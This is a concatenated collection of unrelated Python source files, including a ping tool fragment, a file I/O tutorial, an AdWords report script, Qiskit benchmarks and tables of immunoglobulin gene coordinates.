        address,
        (parsed.packet, parsed.timeout, parsed.interval),
        stats, visualiser, sock, timer, parsed.unlimited)
    # in unlimited mode SIGUSR1 dumps interim statistics on demand,
    # so the handler must be registered before pinging starts
    if parsed.unlimited:
        signal.signal(signal.SIGUSR1, program.signal_handler)
    program.send_and_receive_packets()
    # in limited mode the summary is produced once all packets are done
    if not parsed.unlimited:
        program.process_data()
|
991,645 | f5950fead522dcddb56d07b9dfbb8693a090f6bc | """
Implement stack
"""
class Stack(object):
    """LIFO stack backed by a Python list.

    The original ``size`` body was an unfinished statement (``self.ob``)
    that raised AttributeError at call time; it now returns the element
    count, and basic push/pop operations are provided.
    """

    def __init__(self, arg):
        super(Stack, self).__init__()
        self.arg = arg      # kept for backward compatibility with callers
        self._items = []    # storage for pushed elements

    def size(self):
        """Return the number of elements currently on the stack."""
        return len(self._items)

    def push(self, item):
        """Place *item* on top of the stack."""
        self._items.append(item)

    def pop(self):
        """Remove and return the top element (IndexError if empty)."""
        return self._items.pop()

    def is_empty(self):
        """Return True when the stack holds no elements."""
        return not self._items
991,646 | 056c2716a2e4bee85c6f9d50f3e3e33ec2f294f7 | r'''
__ _ _ _
/ _(_) | ___ (_) ___
| |_| | |/ _ \ | |/ _ \
| _| | | __/ | | (_) |
|_| |_|_|\___| |_|\___/
'''
##=============================================================================
## Generally
##=============================================================================
##
## See also: https://docs.python.org/3/tutorial/inputoutput.html
##
## Writing to text files is fairly easy in Python, provided you understand
## the 'open()' function.
##
## For general use cases, you will only need two arguments:
##
## open(file, mode)
##
## See also: https://docs.python.org/3/library/functions.html#open
# For example:
# For example:
# (the path is relative to the current working directory; the file must exist)
with open('static/_07_/utf8.txt', 'r') as f:
    data = f.readlines()
# the file is closed here, but the lines were already read into memory
for line in data:
    print(line)
## Your filename argument can be:
## 1. A relative filename such as '../Documents'
## 2. An absolute filename such as 'C:\Users\USERNAME\Documents\file.txt'
## 3. A file-like object or abstraction
##
## Your open type argument can be:
##
## 1. 'r' for reading
## 2. 'w' for writing
## 3. 'a' for appending
##
## And the mode argument can have the following modifiers:
## 1. 'b' for binary (such as 'wb' to write a binary file)
## 2. '+' for updating — opening for both reading and writing (such as 'w+' to create, then read and write).
## 3. 'x' for creating and failing if file exists.
## 4. 't' for text files (the default)
##
## There can also be combinations ...
# 'wb+': create/truncate a binary file opened for both writing and reading
with open('static/_07_/new_binary', 'wb+') as f:
    f.write(bytearray([0xa1, 0xb2, 0xc3, 0xd4, 0xe5, 0xf6]))
## Other common arguments are 'encoding' and 'errors'
##
## Python defaults to utf-8 encoding, which necessarily covers ASCII.
## Other encodings, however, such as the Windows CP-1252 or Latin 1
## require explicit conversion.
# decode the file with the Windows-1252 codec
with open('static/_07_/cp1252.txt', encoding='cp1252') as f:
    print(f.read())
## If you anticipate encoding errors, you can specify what is done
## with any errors:
# 'replace' substitutes U+FFFD for undecodable bytes
with open('static/_07_/cp1252.txt', encoding='ascii', errors='replace') as f:
    print(f.read())
# 'ignore' silently drops undecodable bytes
with open('static/_07_/cp1252.txt', encoding='ascii', errors='ignore') as f:
    print(f.read())
# 'strict' (the default) raises UnicodeDecodeError if the file contains
# any non-ASCII bytes
with open('static/_07_/cp1252.txt', encoding='ascii', errors='strict') as f:
    print(f.read())
## Side note: for asynchronous IO, such as file watchers, see the 'asyncio' module.
##
##=============================================================================
## Abstractions
##=============================================================================
##
## You do not necessarily need to read from a file. For example,
## it is often more efficient to download something to RAM and then
## wrap it in a file like abstraction.
import io
# Create empty bytes IO.
file_like_object_bin = io.BytesIO()
# Create file like object
file_like_object_txt = io.StringIO('String file-like object.')
# Side note, you can nest if absolutely necessary.
# Open StringIO
# (leaving a `with` block closes the in-memory stream, so neither object
# can be reused after this point)
with file_like_object_txt as f1:
    # Open BytesIO
    with file_like_object_bin as f2:
        # Read StringIO
        print(f1.read())
        # Write binary data, seek to zero, read data, and print.
        # read() here returns a bytes object, e.g. b'\x01\x01\x02...'
        f2.write(bytearray([1, 1, 2, 3, 5, 8, 13, 21, 34, 55]))
        f2.seek(0)
        print(f2.read())
##=============================================================================
## Questions
##=============================================================================
|
991,647 | b1d1ab238bc67bf799999d59513e1a4db11a8506 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/licenses/gpl.txt
from pisi.actionsapi import autotools, shelltools, get
# Force the automake conditionals to treat valgrind as unavailable —
# presumably so valgrind-only test targets are skipped and the package
# avoids a build dependency on valgrind; TODO confirm against Makefile.am.
shelltools.export('HAVE_VALGRIND_TRUE', '#')
shelltools.export('HAVE_VALGRIND_FALSE', '')
def setup():
    """Configure libdbusmenu for the GTK variant selected by the build type."""
    # the 'gtk2' build type selects the GTK+2 library; anything else builds GTK+3
    gtk_version = 2 if get.buildTYPE() == 'gtk2' else 3
    autotools.configure(' '.join([
        '--disable-dumper',
        '--disable-static',
        '--disable-tests',
        '--with-gtk=%s' % gtk_version
    ]))
def build():
    """Run make over the configured tree."""
    autotools.make()
def install():
    """Install the glib and gtk sub-libraries into the package image."""
    # -j1 forces a serial install for each subdirectory — presumably to
    # avoid races between install targets; TODO confirm
    autotools.rawInstall('-j1 -C libdbusmenu-glib DESTDIR=%s' % get.installDIR())
    autotools.rawInstall('-j1 -C libdbusmenu-gtk DESTDIR=%s' % get.installDIR())
|
991,648 | f4e16668662d49b0ea12a76040d1a5d16fc260ea | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory.
"""
from googleads import adwords
import _locale
import pandas as pd
import io
from datetime import datetime
# Monkey-patch the default-locale lookup to always report en_US/UTF-8 —
# presumably a workaround for platforms whose default locale makes the
# googleads/pandas stack pick a non-UTF-8 encoding; TODO confirm.
_locale._getdefaultlocale = (lambda *args: ['en_US', 'UTF-8']) # change encoding
def main(client):
    """Download the last-7-days AD_PERFORMANCE_REPORT and write it as a
    timestamped, tab-separated file in the current working directory.

    :param client: an initialized ``adwords.AdWordsClient``
    """
    # Initialize service.
    report_downloader = client.GetReportDownloader(version='v201809')
    output = io.StringIO()
    # Create report query (AWQL); date range is fixed to the last 7 days.
    report_query = (adwords.ReportQueryBuilder()
                    .Select("AccountDescriptiveName","CampaignId","AdGroupId","Id","Headline","HeadlinePart1","HeadlinePart2","ShortHeadline","LongHeadline","CreativeFinalUrls","ImageCreativeName","Description","Description1","Description2","DisplayUrl","Path1","Path2","BusinessName","Status","AdGroupStatus","CampaignStatus","CombinedApprovalStatus","AdType","Labels","Impressions","Interactions","InteractionRate","AverageCost",
                            "Cost","VideoQuartile100Rate","Clicks","AveragePosition","Conversions","Date")
                    .From('AD_PERFORMANCE_REPORT')
                    #.Where('Campaign_status').In('ENABLED', 'PAUSED')
                    .During('LAST_7_DAYS')
                    .Build())
    # Stream the TSV report into the in-memory buffer; headers are skipped
    # so rows align with the explicit ``cols`` list below.
    report_downloader.DownloadReportWithAwql(
        report_query, 'TSV', output, skip_report_header=True,  # tab delimited
        skip_column_header=True, skip_report_summary=False,
        include_zero_impressions=True)
    output.seek(0)
    # BUG FIX: the dtype key was 'Avg.Cost' (no space) and never matched the
    # 'Avg. Cost' column below; also replaced the removed ``pd.np`` alias
    # with plain builtins, which read_csv accepts as dtypes.
    types = {'Cost': float, 'Conversions': str, 'Avg. Cost': float}
    cols = ["Account","Campaign ID","Ad group ID","Ad ID","Headline","Headline 1","Headline 2" ,"Short headline","Long headline","Ad final URL","Image ad name","Description","Description 1","Description 2","Display URL",
            "Path 1","Path 2","Business name","Ad status","Adgroup Status","Campaign Status","CombinedApprovalStatus","Ad type","Labels on Ad","Impressions","Interactions","InteractionRate","Avg. Cost","Cost"
            ,"Video played to 100%","Clicks","Avg. position","Conversions","Date"]
    df = pd.read_csv(output, dtype=types, sep="\t", low_memory=False,
                     na_values=[' --'], names=cols)
    # AdWords money fields are reported in micros (1e6 micros = 1 currency unit)
    df['Cost'] = df.Cost / 1000000
    df['Avg. Cost'] = df['Avg. Cost'] / 1000000
    df['Ad'] = df.Headline
    df.drop(df.tail(1).index, inplace=True)  # drop report footer row
    # NOTE: the "AdPerformace" filename typo is kept so downstream
    # consumers of the file keep working
    df.to_csv('AdPerformaceReport-%s.csv' % datetime.now().strftime('%Y%m%d%H%M%S'),
              index=False, sep="\t")  # export to default working directory
if __name__ == '__main__':
    # Initialize client object.
    # Credentials and properties are read from googleads.yaml in the home
    # directory (the LoadFromStorage default location).
    adwords_client = adwords.AdWordsClient.LoadFromStorage() # Config file from default location
    main(adwords_client)
991,649 | c46efbb689e3a27b87c7f1fc47b94b997795150d | def answer(n):
count = 0
n = int(n)
while n != 1:
if n&1 == 0 or n == 4:
n = n >> 1
elif ((n-1)>>1)&1 == 0 or n == 3:
n -= 1
else:
n += 1
count += 1
return count
if __name__ == "__main__":
print answer("4") == 2
print answer("15") == 5
print answer("13") == 5
print answer("9") == 4
print answer("2") == 1
print answer("1") == 0
|
991,650 | 98bdff59e1425ed2654ef42b918ef417f43d1c81 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-09-30 08:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: redefines Comment.edited_count as a
    # plain IntegerField defaulting to 0 (the field was first created in
    # comment/0001_initial, listed as a dependency below).

    dependencies = [
        ('comment', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='comment',
            name='edited_count',
            field=models.IntegerField(default=0),
        ),
    ]
|
991,651 | f1afbb2977e4eb21105ab41f75f1f65b5272286b | #! /usr/bin/python
from dircache import listdir
from re import compile,match
from optparse import OptionParser
from time import mktime,localtime
import sys
xmlpattern = compile("^.*\.xml")
extractpattern = compile("^.*\+(.*)\+s(.*),_(.*),_(.*),_(.*),_(.*),_(.*),_(.*),_(.*),_(.*)e.*")
intpattern = compile("^(.*)\..*")
datafilesuffix = ""
gnuplotfilesuffix = "_rss.gnuplot"
def parsecmdl():
    """Parse the command line.

    --dir is required; when missing, an error is printed and the process
    exits with status 1. Returns the (options, args) pair from optparse.
    (The original placed this docstring after the first statement, where
    it was a no-op string expression.)
    """
    parser = OptionParser()
    parser.add_option('--dir', action='store', type='string', dest='dir')
    (options, args) = parser.parse_args()
    # `is None` instead of `== None`; the error flag was redundant for a
    # single check. Parenthesized print works under Python 2 as well.
    if options.dir is None:
        # fixed typo in the user-facing message ("direcory")
        print("Please give directory in '--dir='")
        sys.exit(1)
    return (options, args)
def extractInfo(ts_file):
    """Extract (event, seconds) from a timestamped result filename.

    The name must match module-level ``extractpattern``: an event number
    after '+', then nine '_'-separated struct_time fields after 's'.
    Seconds are the epoch time of that struct_time via ``mktime``.

    BUG FIX: the body previously matched against the *global* ``file``
    (the caller's loop variable) instead of the ``ts_file`` parameter —
    it only worked by accident. It also shadowed the builtin ``match``.
    """
    m = extractpattern.match(ts_file)
    event = int(m.group(1))
    timestamp = tuple(int(m.group(i)) for i in range(2, 11))
    # mktime returns a float; intpattern strips the fractional part
    secs = int(intpattern.match(str(mktime(timestamp))).group(1))
    return (event, secs)
""" main """
(options,args) = parsecmdl()
files = listdir(options.dir)
gnuplotdatafilename = options.dir + "/" + options.dir + datafilesuffix
gnuplotcommandsfilename = options.dir + "/" + options.dir + gnuplotfilesuffix
""" insert all events """
maxevent = 0
events = {}
for file in files:
if xmlpattern.match(file) != None:
(event,time) = extractInfo(file)
events[event] = time
if event > maxevent:
maxevent = event
gnuplotdatafile = open(gnuplotdatafilename,'w')
if len(events) > 0:
startingmillis = events[1]
startinghour = localtime(startingmillis)[3]
startingsecs = localtime(startingmillis)[4]
else:
sys.exit()
""" time in minutes """
for event in range(1,maxevent+1):
gnuplotdatafile.write(str((events[event] - startingmillis) / 3600.0) + " " + str(event) + "\n")
gnuplotdatafile.close()
gnuplotcommandsfile = open(gnuplotcommandsfilename,'w')
gnuplotcommandsfile.write("unset parametric\n")
gnuplotcommandsfile.write("set xlabel \"time/hrs -- starttime (CEST): " + str(startinghour) + ":" + str(startingsecs) + "h\"\n")
gnuplotcommandsfile.write("set ylabel \"events\"\n")
gnuplotcommandsfile.write("plot '" + gnuplotdatafilename + "' w lp\n")
gnuplotcommandsfile.close()
|
991,652 | 3b3df1d27bd921366747dc6bbc888c5a79951e1e | import logging
from cmreslogging.handlers import CMRESHandler
# Ship log records to a local Elasticsearch instance (index my_python_index)
# without authentication.
handler = CMRESHandler(hosts=[{'host': 'localhost', 'port': 9200}],
                       auth_type=CMRESHandler.AuthType.NO_AUTH,
                       es_index_name="my_python_index")
# basicConfig wires the root logger to app.log; because propagation is on
# by default, records from 'PythonTest' reach both app.log (via the root
# logger) and Elasticsearch (via the handler added below)
logging.basicConfig(filename='app.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s')
log = logging.getLogger("PythonTest")
log.setLevel(logging.INFO)
log.addHandler(handler)
|
991,653 | c36c34fe39bcc8ba58dadac6231e1387ca0c4ec7 | import clr;
from System import Array, String
from System.ComponentModel import TypeConverter, StringConverter
# Connection settings
# Declarative setting descriptors: each class describes one configurable
# value (display name, settings category, help text, default) — presumably
# consumed via reflection by the hosting test framework; TODO confirm.
class Connection(object) :
    DisplayName = 'connection'
    Category = 'Connection'
    Description = 'Serial number of the main phone.'
    DefaultValue = ''
    ReadOnlyForUser = True

class TraceConnection(object) :
    DisplayName = 'trace connection'
    Category = 'Connection'
    Description = 'Trace connection; If defined, trace log will be taken from main phone during test run'
    DefaultValue = ''
    ReadOnlyForUser = True

# Phone settings
class SecurityCode(object) :
    DisplayName = 'security code'
    Category = 'Phone'
    Description = 'Security code of the phone\nAccess path: Main.SecurityCode'
    DefaultValue = ''

class BluetoothName(object) :
    DisplayName = 'bluetooth name'
    Category = 'Phone'
    Description = 'Bluetooth name\nAccess path: Main.BluetoothName'
    DefaultValue = ''

class WLANName(object) :
    DisplayName = '1st WLAN name'
    Category = 'WLAN'
    Description = 'WLAN SSID name\nAccess path: Main.WLANName'
    DefaultValue = ''

class WLANPassword(object) :
    DisplayName = '1st WLAN password'
    Category = 'WLAN'
    DefaultValue = ''
    Description = 'Password for the WLAN network\nAccess path: Main.WLANPassword'

class WLANName2(object) :
    DisplayName = '2nd WLAN name'
    Category = 'WLAN'
    Description = 'Second WLAN SSID name\nAccess path: Main.WLANName2'
    DefaultValue = ''

class WLANPassword2(object) :
    DisplayName = '2nd WLAN password'
    Category = 'WLAN'
    DefaultValue = ''
    Description = 'Password for the second WLAN network\nAccess path: Main.WLANPassword2'
# SIM1 settings
# SIM1 settings: one descriptor per value of the first SIM card
# (same declarative pattern as the Connection/Phone descriptors above).
class SIM1PhoneNumber(object) :
    DisplayName = 'phone number'
    Category = 'SIM1'
    Description = 'Phone number (in format 045123456 or +35845123456)\nAccess path: Main.SIM1PhoneNumber'
    DefaultValue = ''

class SIM1PinCode(object) :
    DisplayName = 'pin code'
    Category = 'SIM1'
    Description = 'Access path: Main.SIM1PinCode'
    DefaultValue = ''

class SIM1Pin2Code(object) :
    DisplayName = 'pin2 code'
    Category = 'SIM1'
    Description = 'Access path: Main.SIM1Pin2Code'
    DefaultValue = ''

class SIM1Puk1Code(object) :
    DisplayName = 'puk1 code'
    Category = 'SIM1'
    Description = 'Access path: Main.SIM1Puk1Code'
    DefaultValue = ''

class SIM1Puk2Code(object) :
    DisplayName = 'puk2 code'
    Category = 'SIM1'
    Description = 'Access path: Main.SIM1Puk2Code'
    DefaultValue = ''

class SIM1ServiceNumber(object) :
    DisplayName = 'service number'
    Category = 'SIM1'
    Description = 'Access path: Main.SIM1ServiceNumber'
    DefaultValue = ''

class SIM1VoiceMailNumber(object) :
    DisplayName = 'voice mail number'
    Category = 'SIM1'
    Description = 'Access path: Main.SIM1VoiceMailNumber'
    DefaultValue = ''
# SIM2 settings
# SIM2 settings: mirrors the SIM1 descriptors for the second SIM card.
class SIM2PhoneNumber(object) :
    DisplayName = 'phone number'
    Category = 'SIM2'
    Description = 'Phone number (in format 045123456 or +35845123456)\nAccess path: Main.SIM2PhoneNumber'
    DefaultValue = ''

class SIM2PinCode(object) :
    DisplayName = 'pin code'
    Category = 'SIM2'
    Description = 'Access path: Main.SIM2PinCode'
    DefaultValue = ''

class SIM2Pin2Code(object) :
    DisplayName = 'pin2 code'
    Category = 'SIM2'
    Description = 'Access path: Main.SIM2Pin2Code'
    DefaultValue = ''

class SIM2Puk1Code(object) :
    DisplayName = 'puk1 code'
    Category = 'SIM2'
    Description = 'Access path: Main.SIM2Puk1Code'
    DefaultValue = ''

class SIM2Puk2Code(object) :
    DisplayName = 'puk2 code'
    Category = 'SIM2'
    Description = 'Access path: Main.SIM2Puk2Code'
    DefaultValue = ''

class SIM2ServiceNumber(object) :
    DisplayName = 'service number'
    Category = 'SIM2'
    Description = 'Access path: Main.SIM2ServiceNumber'
    DefaultValue = ''

class SIM2VoiceMailNumber(object) :
    DisplayName = 'voice mail number'
    Category = 'SIM2'
    Description = 'Access path: Main.SIM2VoiceMailNumber'
    DefaultValue = ''
|
991,654 | 5cb3a2df2693ea4d511b5d3dd38600def11d8249 | # -*- coding: utf-8 -*
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=missing-docstring,invalid-name,no-member
# pylint: disable=attribute-defined-outside-init
import itertools
from qiskit import QuantumRegister, QuantumCircuit
from qiskit.circuit import Parameter
def build_circuit(width, gates):
qr = QuantumRegister(width)
qc = QuantumCircuit(qr)
while len(qc) < gates:
for k in range(width):
qc.h(qr[k])
for k in range(width-1):
qc.cx(qr[k], qr[k+1])
return qc
class CircuitConstructionBench:
params = ([1, 2, 5, 8, 14, 20], [8, 128, 2048, 8192, 32768, 131072])
param_names = ['width', 'gates']
timeout = 600
def setup(self, width, gates):
self.empty_circuit = build_circuit(width, 0)
self.sample_circuit = build_circuit(width, gates)
def time_circuit_construction(self, width, gates):
build_circuit(width, gates)
def time_circuit_extend(self, _, __):
self.empty_circuit.extend(self.sample_circuit)
def time_circuit_copy(self, _, __):
self.sample_circuit.copy()
def build_parameterized_circuit(width, gates, param_count):
params = [Parameter('param-%s' % x) for x in range(param_count)]
param_iter = itertools.cycle(params)
qr = QuantumRegister(width)
qc = QuantumCircuit(qr)
while len(qc) < gates:
for k in range(width):
param = next(param_iter)
qc.u2(0, param, qr[k])
for k in range(width-1):
param = next(param_iter)
qc.crx(param, qr[k], qr[k+1])
return qc, params
class ParameterizedCircuitConstructionBench:
params = ([20], [8, 128, 2048, 8192, 32768, 131072],
[8, 128, 2048, 8192, 32768, 131072])
param_names = ['width', 'gates', 'number of params']
timeout = 600
def setup(self, _, gates, params):
if params > gates:
raise NotImplementedError
def time_build_parameterized_circuit(self, width, gates, params):
build_parameterized_circuit(width, gates, params)
class ParameterizedCircuitBindBench:
params = ([20], [8, 128, 2048, 8192, 32768, 131072],
[8, 128, 2048, 8192, 32768, 131072])
param_names = ['width', 'gates', 'number of params']
timeout = 600
def setup(self, width, gates, params):
if params > gates:
raise NotImplementedError
self.circuit, self.params = build_parameterized_circuit(width,
gates,
params)
def time_bind_params(self, _, __, ___):
self.circuit.bind_parameters({x: 3.14 for x in self.params})
|
991,655 | 7a0e8619e858492e5c985a1b5b0a982a56e0b62c |
# IGHV (heavy-chain V) gene segments -> (start, end) coordinates.
# BUG FIX: the values were written with '-' instead of ',', e.g. (238-537),
# which Python evaluates to a single negative int (-299). Every other
# Sig*/RF_* table in this file stores (start, end) tuples, and the scaffold
# comments document ranges, so the commas are restored here.
Sighv = {
    'IGHV3OR15': (238, 537),       # Scaffold1099214757507
    'IGHV3-23': (797, 1845),       # Scaffold1099214148171
    'IGHV3-72': (700393, 701553),  # Scaffold1099548049584
    'IGHV3-7': (654699, 654992),   # Scaffold1099548049584
    'IGHV3-49': (187218, 187895)   # Scaffold1099548049584
}
#Chr10: Lambda
# Chr10, lambda-chain V gene segments -> (start, end) coordinates.
# BUG FIX: as with Sighv above, the values were accidental subtractions
# like (66038886-66039290) yielding single negative ints; the (start, end)
# tuple form used by the other tables in this file is restored.
Siglv = {
    'IGLV5-52': (66038886, 66039290),
    'IGLV7-46': (66222287, 66222580),
    'IGLV9-49': (66252992, 66253527),
    'IGLV1-51': (66335879, 66336272),
    'IGLV5-45': (66226801, 66227112),
    'IGLV11-55': (65906638, 65906946),
    'IGLV10-54': (65929928, 65930221),
    'IGLV8-61': (65803593, 65803889)
}
#Chr13 Kappa
# Chr13, kappa-chain V gene segments -> (start, end) coordinates.
# NOTE(review): the coordinates fall in two distant clusters (~89.4-90.2 Mb
# and ~113.2 Mb) — presumably two kappa loci/contigs; confirm.
Sigkv={
    'IGKV4-1': (89436957,89437895),
    'IGKV1-27':(90246706,90247293),
    'IGKV2D-2':(113209235,113209678),
    'IGKV3-20':(89827964,89828257)
}
#Chr7: TRAV
# Chr7, TRAV (T-cell receptor alpha V) segments -> (start, end) coordinates;
# the last two entries live on separate scaffolds (see trailing comments).
Strav = {
    'TRAV14DV4':(84639642,84640144),
    'TRAV8-6':(84695438,84695874),
    'TRAV40':(85118821,85119249),
    'TRAV30':(84991102,84991653),
    'TRAV25':(84934218,84934823),
    'TRAV6':(84496390,84496913),
    'TRAV5':(84486442,84486950),
    'TRAV4':(84467455,84468214),
    'TRAV27':(84971778,84972336),
    'TRAV17':(84716663,84717140),
    'TRAV19':(84732052,84732598),
    'TRAV8-4':(84564285,84564755),
    'TRAV41':(85125178,85125679),
    'TRAV22': (1261,1818), # Scaffold1099214732309
    'TRAV23DV6': (627,1136) #Scaffold1099214128018:
}
#chr3: trbv
# Chr3, TRBV (T-cell receptor beta V) segments -> (start, end) coordinates.
Strbv={
    'TRBV11-3':(180086601,180112240),
    'TRBV5-6':(179988975,179989609),
    'TRBV5-4':(179951177,179951702),
    'TRBV5-3':(179877783,179878247),
    'TRBV5-1':(179805555,179806016),
    'TRBV11-1':(179921910,179922345),
    'TRBV18':(180168975,180169600),
    'TRBV13':(180093458,180093897)
}
# -------------------------------
### Vext_* tables below: per-segment start positions (scaffold/chromosome coordinates), presumably used to locate each V segment on its scaffold.
Vext_ighv={
'Vs155':1482, #scaffold:MMUL_1:1099548049584
'Vs157':38589, #.
'Vs158':48226,
'Vs159':55680,
'Vs160':64967,
'Vs161':97734,
'Vs162':146617,
'Vs163':175855,
'Vs164':187206,
'Vs165':203923,
'Vs166':290356,
'Vs167':294318,
'Vs168':331177,
'Vs169':439323,
'Vs170':477121,
'Vs171':491717,
'Vs172':520616,
'Vs173':565606,
'Vs174':593374,
'Vs175':601142,
'Vs176':604651,
'Vs177':613004,
'Vs178':654687,
'Vs179':661967,
'Vs180':700541,
'Vs181':716255,
'Vs182':725596,
'Vs183':759510,
'Vs185':227, #scaffold:MMUL_1:1099214757507:
'Vs191':1856 #scaffold:MMUL_1:1099214148171
}
# Chr13
Vext_igkv={
'Vs37':377093,
'Vs38':429921,
'Vs39':466829,
'Vs40':497324,
'Vs41':520019,
'Vs42':528120,
'Vs43':536211,
'Vs44':561293,
'Vs45':569515,
'Vs46':589685,
'Vs47':629218,
'Vs48':663090,
'Vs49':699982,
'Vs50':713632,
'Vs51':729148,
'Vs52':734143,
'Vs53':753062,
'Vs54':774940,
'Vs55':782905,
'Vs186':327035,
'Vs187':267149,
'Vs188':262262
}
#chr10
Vext_iglv={
'Vs0':499988,
'Vs2':626324,
'Vs3':636158,
'Vs4':647190,
'Vs5':687902,
'Vs6':715146,
'Vs7':880405,
'Vs8':918683,
'Vs9':928009,
'Vs10':933349,
'Vs11':949609,
'Vs12':956355,
'Vs13':960994,
'Vs14':970235,
'Vs15':979760,
'Vs16':988832,
'Vs17':996455,
'Vs18':1001031,
'Vs19':1014418,
'Vs20':1036509,
'Vs21':1041518,
'Vs22':1047342,
'Vs23':1070108,
'Vs24':1074656,
'Vs25':1139987,
'Vs26':1376639,
'Vs27':1381117,
'Vs28':1387609,
'Vs29':1405133,
'Vs30':1412774,
'Vs31':1431853,
'Vs32':1440262,
'Vs33':1452426,
'Vs34':1476245,
'Vs35':1499973,
'Vs36':1510598
}
#chr3
Vext_trbv={
'Vs56':442592,
'Vs57':449559,
'Vs58':454203,
'Vs59':462425,
'Vs60':470019,
'Vs61':478529,
'Vs62':485047,
'Vs63':489384,
'Vs64':500170,
'Vs65':508102,
'Vs66':522890,
'Vs67':526323,
'Vs68':538096,
'Vs69':567357,
'Vs70':575084,
'Vs71':583391,
'Vs72':594749,
'Vs73':607340,
'Vs74':616497,
'Vs75':633607,
'Vs76':637840,
'Vs77':645856,
'Vs78':673129,
'Vs79':683763,
'Vs80':694695,
'Vs81':699763,
'Vs82':705793,
'Vs83':731651,
'Vs84':739086,
'Vs85':751477,
'Vs86':763018,
'Vs87':770506,
'Vs88':781233,
'Vs89':788055,
'Vs90':795359,
'Vs91':806398,
'Vs92':811999,
'Vs93':815267,
'Vs94':830609,
'Vs95':837595,
'Vs96':843249,
'Vs97':849127,
'Vs98':863754,
'Vs99':866976,
'Vs100':874916,
'Vs101':885261,
'Vs102':894238,
'Vs103':906242,
'Vs104':914071,
'Vs105':954970,
'Vs106':960303,
'Vs107':974120,
'Vs189':1150891
}
# -----------------------------------
# New Program:
RF_ighv= {
'V165RF':(1480, 1787), # scaffold1099548049584
'V166RF':(38587, 38894),
'V167RF':(48224, 48531),
'V168RF':(55679, 55992),
'V169RF':(64965, 65272),
'V170RF':(97732, 98036),
'V171RF':(146615, 146925),
'V172RF':(167535, 167842),
'V173RF':(175853, 176160),
'V174RF':(187204, 187517),
'V175RF':(203920, 204227),
'V176RF':(290354, 290661),
'V177RF':(294316, 294626),
'V178RF':(331174, 331484),
'V179RF':(439321, 439628),
'V180RF':(477119, 477426),
'V181RF':(491715, 492025),
'V182RF':(520614, 520924),
'V183RF':(565603, 565913),
'V184RF':(593372, 593679),
'V185RF':(601140, 601453),
'V186RF':(604649, 604959),
'V187RF':(613002, 613309),
'V188RF':(654685, 654992),
'V189RF':(661965, 662272),
'V190RF':(700539, 700852),
'V191RF':(716253, 716560),
'V192RF':(725594, 725898),
'V193RF':(742215, 742522),
'V194RF':(759508, 759812),
'V196RF':(224, 537), # scaffold1099214757507
'V202RF':(92, 399) # scaffold1099214148171
}
#Chr10
RF_iglv= {
'V0RF':(499986, 500293),
'V1RF':(603028, 603353),
'V2RF':(626321, 626628),
'V3RF':(636156, 636463),
'V4RF':(647188, 647498),
'V5RF':(687899, 688209),
'V6RF':(707274, 707563),
'V7RF':(715143, 715453),
'V8RF':(735210, 735538),
'V9RF':(880402, 880712),
'V10RF':(918680, 918987),
'V11RF':(923194, 923519),
'V12RF':(928007, 928314),
'V13RF':(933346, 933653),
'V14RF':(949606, 949910),
'V15RF':(956352, 956662),
'V16RF':(960992, 961299),
'V17RF':(970232, 970539),
'V18RF':(979758, 980065),
'V19RF':(988829, 989136),
'V20RF':(996452, 996762),
'V21RF':(1001029, 1001336),
'V22RF':(1014415, 1014722),
'V23RF':(1036507, 1036814),
'V24RF':(1041515, 1041822),
'V25RF':(1047339, 1047646),
'V26RF':(1070105, 1070415),
'V27RF':(1074654, 1074961),
'V28RF':(1112608, 1112930),
'V29RF':(1376637, 1376938),
'V30RF':(1381115, 1381416),
'V31RF':(1387607, 1387908),
'V32RF':(1396836, 1397131),
'V33RF':(1405131, 1405432),
'V34RF':(1412772, 1413073),
'V35RF':(1431851, 1432152),
'V36RF':(1440260, 1440561),
'V37RF':(1452424, 1452725),
'V38RF':(1476242, 1476552),
'V39RF':(1499971, 1500272),
'V40RF':(1510596, 1510897)
}
#Chr13
RF_igkv= {
'V41RF':(377091, 377404),
'V42RF':(429919, 430217),
'V43RF':(448936, 449237),
'V44RF':(466827, 467140),
'V45RF':(489129, 489445),
'V46RF':(497323, 497627),
'V47RF':(515103, 515416),
'V48RF':(520017, 520330),
'V49RF':(523451, 523764),
'V50RF':(528118, 528416),
'V51RF':(536209, 536522),
'V52RF':(561291, 561604),
'V53RF':(569513, 569811),
'V54RF':(589684, 589985),
'V55RF':(629216, 629514),
'V56RF':(663087, 663385),
'V57RF':(699980, 700296),
'V58RF':(713630, 713928),
'V59RF':(729146, 729459),
'V60RF':(734141, 734454),
'V61RF':(753060, 753373),
'V62RF':(774938, 775236),
'V63RF':(782904, 783217),
'V197RF':(733293, 733594),
'V198RF':(738179, 738495)
}
#Chr3
RF_trbv= {
'V64RF':(442590, 442888),
'V65RF':(449557, 449852),
'V66RF':(454201, 454496),
'V67RF':(462423, 462721),
'V68RF':(470017, 470312),
'V69RF':(478527, 478825),
'V70RF':(485045, 485340),
'V71RF':(489382, 489677),
'V72RF':(500169, 500464),
'V73RF':(508100, 508395),
'V74RF':(522888, 523183),
'V75RF':(526321, 526616),
'V76RF':(538094, 538389),
'V77RF':(567355, 567653),
'V78RF':(572397, 572695),
'V79RF':(575083, 575378),
'V80RF':(583389, 583684),
'V81RF':(594747, 595045),
'V82RF':(607338, 607633),
'V83RF':(616495, 616793),
'V84RF':(633605, 633900),
'V85RF':(637838, 638136),
'V86RF':(645855, 646150),
